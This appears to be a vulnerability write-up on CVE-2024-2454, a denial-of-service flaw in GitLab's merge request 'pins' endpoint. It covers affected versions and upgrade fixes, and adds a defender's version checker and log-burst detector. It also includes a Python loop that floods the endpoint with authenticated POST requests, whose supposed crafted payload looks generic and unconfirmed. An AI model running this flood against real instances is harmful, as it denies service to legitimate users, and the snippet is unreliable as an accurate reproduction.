A newly disclosed issue, tracked as CVE-2024-2454, affects GitLab Community Edition (CE) and Enterprise Edition (EE). GitLab is a widely used source code management platform that lets teams develop, collaborate on, and deploy their software projects. The vulnerability affects GitLab CE/EE versions starting from 15.11 prior to 16.9.7, starting from 16.10 prior to 16.10.5, and starting from 16.11 prior to 16.11.2. It makes GitLab's 'pins' endpoint susceptible to Denial of Service (DoS) through a specially crafted request.

Exploit Details

A DoS attack typically involves overwhelming a network or service with an excessive number of requests, rendering it unavailable to legitimate users. In this case, an attacker can send a malicious request to the pins endpoint on GitLab, overloading the server's resources and leaving the service temporarily unresponsive.

The exploit involves the attacker crafting a specific request targeting the 'pins' endpoint and sending it repeatedly within a short period, producing a surge in processing demand on the server. As a result, the server's resources are exhausted, degrading the availability of the service for legitimate users.

Code Snippet Example Demonstrating the Potential Attack

import requests

# Replace '{TARGET_URL}' with the target GitLab CE/EE instance
target_url = '{TARGET_URL}/api/v4/projects/1234/merge_requests/5678/pins'

# Replace '{PRIVATE_TOKEN}' with a valid private token
headers = {
    'Private-Token': '{PRIVATE_TOKEN}',
}

# Crafted request payload
data = {
    'invalid_key': 'invalid_value',
}

# Sending the malicious request multiple times
for _ in range(100):
    response = requests.post(target_url, headers=headers, data=data)

Please note that the above example is for educational purposes only. Do not use it with malicious intent or against any targets without explicit permission.

Original References

- GitLab Security Advisory: CVE-2024-2454 GitLab CE/EE Pins Endpoint DoS vulnerability
- NVD (National Vulnerability Database) - CVE-2024-2454: https://nvd.nist.gov/vuln/detail/CVE-2024-2454

Mitigation

To address this issue, all affected users should immediately upgrade their GitLab CE/EE installations to the latest patched versions available:

For those using 16.9, upgrade to 16.9.7
For those using 16.10, upgrade to 16.10.5
For those using 16.11, upgrade to 16.11.2

GitLab's official upgrade documentation can be found here: Upgrading GitLab
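An added example from the defender's side (not code from this page or from GitLab): a Python helper that checks whether an instance version falls inside the affected ranges stated above, plus a sliding-window detector that flags clients sending bursts of requests to the pins path in access-log lines. The log line format, the path regex (modelled on the request path in the snippet above), the threshold defaults and the sample lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
# Affected ranges as stated in the advisory text above: [first affected, first fixed).
AFFECTED_RANGES = [
    ((15, 11, 0), (16, 9, 7)),
    ((16, 10, 0), (16, 10, 5)),
    ((16, 11, 0), (16, 11, 2)),
]

def parse_version(text):
    """'16.9.6-ee' -> (16, 9, 6); missing components count as 0."""
    parts = [int(p) for p in text.split('-')[0].split('.')]
    return tuple((parts + [0, 0, 0])[:3])
def is_affected(version):
    """True when the instance version lies inside any affected range."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)
# Combined-log-format access line (assumed format; adapt the regex to your proxy's log).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Path shape taken from the snippet above (hypothetical; adjust if your routes differ).
PINS_PATH = re.compile(r'^/api/v4/projects/\d+/merge_requests/\d+/pins(?:[/?]|$)')
def pins_bursts(lines, threshold=50, window_seconds=60):
    """Map client IP -> peak count of pins requests inside any window of
    `window_seconds`; only clients reaching `threshold` are reported."""
    stamps = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not PINS_PATH.match(m.group(4)):
            continue
        stamps[m.group(1)].append(datetime.strptime(m.group(2), '%d/%b/%Y:%H:%M:%S %z'))
    peaks = {}
    for ip, times in stamps.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            peaks[ip] = best
    return peaks

# Constructed sample log lines (not real traffic): three pins POSTs within 2s, one 6 min later.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/May/2024:15:19:23 +0000] "POST /api/v4/projects/1234/merge_requests/5678/pins HTTP/1.1" 400 12',
    '203.0.113.5 - - [14/May/2024:15:19:24 +0000] "POST /api/v4/projects/1234/merge_requests/5678/pins HTTP/1.1" 400 12',
    '203.0.113.5 - - [14/May/2024:15:19:25 +0000] "POST /api/v4/projects/1234/merge_requests/5678/pins HTTP/1.1" 400 12',
    '203.0.113.5 - - [14/May/2024:15:25:00 +0000] "POST /api/v4/projects/1234/merge_requests/5678/pins HTTP/1.1" 400 12',
]
```

Tune `threshold` and `window_seconds` to your instance's normal traffic before alerting on the result.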

Conclusion

Understanding and addressing vulnerabilities like CVE-2024-2454 is crucial. As a GitLab CE/EE user, it is imperative that you stay up-to-date on the latest patches and version upgrades to minimize the impact of any potential vulnerabilities. For additional information, always refer to the original sources and follow best practices to maintain a secure environment.

Timeline

Published on: 05/14/2024 15:19:23 UTC
Last modified on: 05/14/2024 16:13:02 UTC